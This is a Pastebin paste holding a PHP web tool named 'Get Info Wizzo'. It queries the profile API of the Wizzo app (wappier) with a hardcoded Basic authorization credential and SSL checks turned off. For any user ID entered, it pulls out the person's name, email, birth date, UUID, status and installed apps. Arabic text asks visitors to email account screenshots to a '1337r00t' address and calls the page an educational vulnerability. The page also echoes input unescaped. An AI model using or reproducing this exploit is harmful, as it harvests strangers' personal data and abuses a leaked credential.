Advertisement
BugAR

Pwned Emails Wizzo

May 24th, 2017
620
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.59 KB | None | 0 0
  1. <title>Get Info Wizzo</title>
  2. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/Vw2HXPuqzxCdUAisiapQVtAAposUE4hetZCOoiWer6n5GoJnhzBwiFSDH_8rCQQidpE=w300" type="image/x-icon" />
  3. <style type="text/css">
  4. html {
  5.         background: url(https://cdn-d4d.kxcdn.com/wp-content/uploads/2015/07/hacker_wallpapers-1.jpg) no-repeat center center fixed;
  6.         -webkit-background-size: cover;
  7.         -moz-background-size: cover;
  8.         -o-background-size: cover;
  9.         background-size: cover;
  10. }
  11. </style>
  12. <style>
  13. input[type=text] {
  14.     padding:5px;
  15.     border:2px solid #ccc;
  16.     -webkit-border-radius: 5px;
  17.     border-radius: 5px;
  18. }
  19.  
  20. input[type=text]:focus {
  21.     border-color:#333;
  22. }
  23.  
  24. input[type=submit] {
  25.     padding:5px 15px;
  26.     background:#ccc;
  27.     border:0 none;
  28.     cursor:pointer;
  29.     -webkit-border-radius: 5px;
  30.     border-radius: 5px;
  31. }
  32. </style>
  33. <center>
  34. <img src="https://lh3.googleusercontent.com/Vw2HXPuqzxCdUAisiapQVtAAposUE4hetZCOoiWer6n5GoJnhzBwiFSDH_8rCQQidpE=w190">
  35. <br><br><br>
  36. <form action="" method="post">
  37. <center>
  38. <font color="white">ارسل صورة حساب المتسابق على الأيميل : wiz@1337r00t.com</font><br></br>
  39. <font color="blue">ثم ضع الآي دي المرسل لك هنا</font><br>
  40. <font color="red"> ID :<input type="text" name="id"></font><br><br>
  41. <input type="submit" value="Get Info :)">
  42. </center>
  43. </form>
  44. <?
  45. $id = $_POST['id'];
  46. $wizzo = curl_init();
  47. curl_setopt($wizzo, CURLOPT_URL, "https://wizzo.wappier.com/api/profile/$id/?fields=user");
  48. curl_setopt($wizzo, CURLOPT_SSL_VERIFYPEER, false);
  49. curl_setopt($wizzo, CURLOPT_RETURNTRANSFER, 1);
  50. curl_setopt($wizzo, CURLOPT_FOLLOWLOCATION, 1);
  51. curl_setopt($wizzo, CURLOPT_HEADER, 1);
  52. curl_setopt($wizzo, CURLOPT_HTTPHEADER, array(
  53.     'Authorization: Basic NTkyNTYzNDMwZmE4YzUxZjVmYWRkODk2OnpTQTA3NWt3',
  54.     'Host: wizzo.wappier.com',
  55.     'Connection: Keep-Alive'
  56.     ));
  57. curl_setopt($wizzo, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  58. $source = curl_exec($wizzo);
  59. if(eregi('{"user":{"_id":"'.$id.'"', $source))
  60.     {
  61.         ///////////////////
  62.         $startbirth = explode('"datebirth":"' , $source );
  63.         $endbirth = explode('T' , $startbirth[1] );
  64.         $birth = $endbirth[0];
  65.         ######################
  66.         $startname = explode('"name":"' , $source );
  67.         $endname = explode('"' , $startname[1] );
  68.         $name = $endname[0];
  69.         ######################
  70.         $startemail = explode('"username":"' , $source );
  71.         $endemail = explode('"' , $startemail[1] );
  72.         $email = $endemail[0];
  73.         ######################
  74.         $startuuid = explode('"uuid":"' , $source );
  75.         $enduuid = explode('"' , $startuuid[1] );
  76.         $uuid = $enduuid[0];
  77.         ######################
  78.         $startstatus = explode('"status":"' , $source );
  79.         $endstatus = explode('"' , $startstatus[1] );
  80.         $status = $endstatus[0];
  81.         ######################
  82.         $startinstalled = explode('"installedApps":["' , $source );
  83.         $endinstalled = explode(']' , $startinstalled[1] );
  84.         $installed = $endinstalled[0];
  85.         ///////////////////
  86.         echo '
  87.         <br>
  88.         <center>
  89.         <font color="green">
  90.         Id : '.$id.'<br>
  91.         Name : '.$name.'<br>
  92.         Email : '.$email.'<br>
  93.         UUID : '.$uuid.'<br>
  94.         Status : '.$status.'<br>
  95.         installedApps -> <input type="text" value="'.$installed.'"><br>
  96.         هذه الثغرة تعليمية فقط
  97.         </font>
  98.         </center>
  99.         <br>
  100.         ';
  101.     }
  102.     else
  103.     {
  104.         if(eregi('Unauthorized', $source))
  105.             {
  106.                 echo "<br><center><font color='red'>Unauthorized</font></center><br>";
  107.             }
  108.             else
  109.             {
  110.                 echo '<script>alert("")</script>';
  111.                 echo "<br><center><font color='blue'>Failed or input any id</font></center><br>";
  112.             }
  113.     }
  114. curl_close($wizzo);
  115. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement